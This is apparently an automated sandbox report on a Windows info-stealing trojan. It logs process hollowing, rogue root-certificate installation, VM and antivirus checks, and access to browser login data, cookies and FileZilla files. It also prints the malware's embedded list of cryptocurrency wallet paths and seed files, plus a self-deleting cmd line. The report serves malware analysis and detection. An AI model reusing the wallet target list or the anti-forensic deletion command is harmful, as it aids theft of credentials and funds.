Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: String function: 1D73395E appears 81 times
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: String function: 1D733AF3 appears 37 times
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: String function: 1D731F5A appears 36 times
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: String function: 1D9106B1 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: String function: 1D73415B appears 173 times
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: String function: 1D731C2B appears 47 times
Source: 82xul16VKj.exe, 00000000.00000002.342118140.000000000018D000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameResHack! vs 82xul16VKj.exe
Source: 82xul16VKj.exe, 00000000.00000002.342285744.0000000000324000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameResHack! vs 82xul16VKj.exe
Source: 82xul16VKj.exe, 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameResHack! vs 82xul16VKj.exe
Source: 82xul16VKj.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/14@4/4
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\C7GDP0V0.txt Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe File created: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Console Write: (wide-character console buffer, no readable text recovered) Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Console Write: Waiting for 10 seconds, press a key to continue ... Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Console Write: countdown 9, 8, 7, 6, 5, 4, 3, 2, 1, 0, 0 (one write per remaining second) Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: kat2B07.tmp, kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: kat2B07.tmp, kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: kat2B07.tmp, kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: 82xul16VKj.exe Virustotal: Detection: 39%
Source: unknown Process created: C:\Users\user\Desktop\82xul16VKj.exe "C:\Users\user\Desktop\82xul16VKj.exe"
Source: C:\Users\user\Desktop\82xul16VKj.exe Process created: C:\Users\user\AppData\Local\Temp\kat2B07.tmp C:\Users\user\AppData\Local\Temp\kat2B07.tmp
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat2B07.tmp" & rd /s /q "C:\ProgramData\GHDAAKJEGCFC" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\82xul16VKj.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: bcrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: credssp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: cryptnet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: sensapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: cabinet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: devrtl.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: wbemcomn2.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: ntdsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: sxs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winbrand.dll Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: 82xul16VKj.exe Static file information: File size 1608192 > 1048576
Source: 82xul16VKj.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x12a000
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr
Source: sqlt[1].dll.2.dr Static PE information: section name: .00cfg
Source: C:\Users\user\Desktop\82xul16VKj.exe Code function: 0_2_02EECA10 push edx; ret 0_2_02EECC1F
Source: C:\Users\user\Desktop\82xul16VKj.exe Code function: 0_2_02EEC310 push edx; ret 0_2_02EEC31B
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D731BF9 push ecx; ret 2_2_1D8D4C03
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7310C8 push ecx; ret 2_2_1D933552

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\sqlt[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\82xul16VKj.exe File created: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: initial sample Icon embedded in binary file: icon matches a legit application icon: icon.png
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\sqlt[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp API coverage: 3.1 %
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp TID: 2372 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp TID: 2372 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 2848 Thread sleep count: 90 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000824000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareA
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000824000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D732C8E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_1D732C8E
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7346A6 GetProcessHeap, 2_2_1D7346A6
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7342AF SetUnhandledExceptionFilter, 2_2_1D7342AF

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: 82xul16VKj.exe PID: 2112, type: MEMORYSTR
Source: C:\Users\user\Desktop\82xul16VKj.exe Memory allocated: C:\Users\user\AppData\Local\Temp\kat2B07.tmp base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe Code function: 0_2_02EEBEF0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess, 0_2_02EEBEF0
Source: C:\Users\user\Desktop\82xul16VKj.exe Memory written: C:\Users\user\AppData\Local\Temp\kat2B07.tmp base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe Section unmapped: C:\Users\user\AppData\Local\Temp\kat2B07.tmp base address: 400000 Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe Memory written: C:\Users\user\AppData\Local\Temp\kat2B07.tmp base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe Memory written: C:\Users\user\AppData\Local\Temp\kat2B07.tmp base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe Memory written: C:\Users\user\AppData\Local\Temp\kat2B07.tmp base: 425000 Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe Memory written: C:\Users\user\AppData\Local\Temp\kat2B07.tmp base: 42E000 Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe Memory written: C:\Users\user\AppData\Local\Temp\kat2B07.tmp base: 643000 Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe Process created: C:\Users\user\AppData\Local\Temp\kat2B07.tmp C:\Users\user\AppData\Local\Temp\kat2B07.tmp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat2B07.tmp" & rd /s /q "C:\ProgramData\GHDAAKJEGCFC" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: GetLocaleInfoW, 2_2_1D732112
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: EnumSystemLocalesW, 2_2_1D90FF17
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 2_2_1D73298C
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D73433C GetSystemTimeAsFileTime, 2_2_1D73433C
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D914D7C GetTimeZoneInformation, 2_2_1D914D7C
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 00000000.00000002.342512838.0000000002EEB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.82xul16VKj.exe.3080000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.82xul16VKj.exe.2eb7719.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.82xul16VKj.exe.2eb7719.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.82xul16VKj.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.82xul16VKj.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.342253005.00000000002A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.342560030.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 82xul16VKj.exe PID: 2112, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: kat2B07.tmp PID: 204, type: MEMORYSTR
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: um-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\prefs.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\Exodus\backups\ Jump to behavior
